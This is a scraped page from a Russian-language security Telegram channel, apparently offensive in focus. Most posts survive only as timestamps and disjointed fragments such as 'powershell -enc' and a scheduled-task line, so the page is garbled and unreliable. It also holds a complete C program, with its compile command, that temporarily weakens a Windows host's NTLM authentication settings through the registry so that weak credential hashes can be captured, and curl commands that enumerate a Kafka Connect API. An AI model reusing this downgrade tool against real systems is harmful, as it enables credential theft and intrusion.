Будьте здоровы и счастливы. 🍾🍾🍾
Представляем вам канал True Security, созданный автором и владельцем Zer0Way - @Nu11ed09. Этот канал предлагает всесторонние сведения о кибербезопасности, защите данных и приватности в онлайн-мире. Исследуйте новейшие технологии и методы защиты, узнайте о последних угрозах и уязвимостях, получите советы по безопасности и многое другое. True Security - ваш надежный проводник в мире цифровой безопасности. Присоединяйтесь к нам сегодня, чтобы обеспечить защиту себе и вашей информации в сети!
31 Dec, 13:29
13 Dec, 10:44
powershell -enc
.<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
в поле TaskContent.19 Nov, 05:35
10 Nov, 14:23
23 Oct, 10:40
19 Aug, 16:43
19 Aug, 09:58
16 Aug, 13:01
13 Aug, 14:54
13 Aug, 09:11
#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep
void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
RegCloseKey(hKey);
*oldValue = value;
} else {
printf("Ошибка чтения ключа реестра.\n");
}
}
void SetRegKey(const char* path, const char* key, DWORD newValue) {
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
RegCloseKey(hKey);
} else {
printf("Ошибка записи ключа реестра.\n");
}
}
void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}
void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}
int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;
ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);
// Задержка 60 секунд
sleep(60);
NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);
return 0;
}
x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c
11 Aug, 08:13
curl http://ip:8083/connectors/ | jq "."
curl http://ip:8083/connectors/name | jq "."
03 Aug, 18:28
"I played with the Desktop Wallpaper and was able to change the desktop background image of Adminstrator"
16 Jul, 15:21
16 Jul, 14:29
25 Jun, 07:06
RPC_C_IMP_LEVEL_IMPERSONATE
🤫). Впрочем, я готов принимать PR :)) 14 Jun, 05:39
13 Jun, 13:55
11 Jun, 07:33
11 Jun, 06:40
26 May, 18:16
26 May, 11:45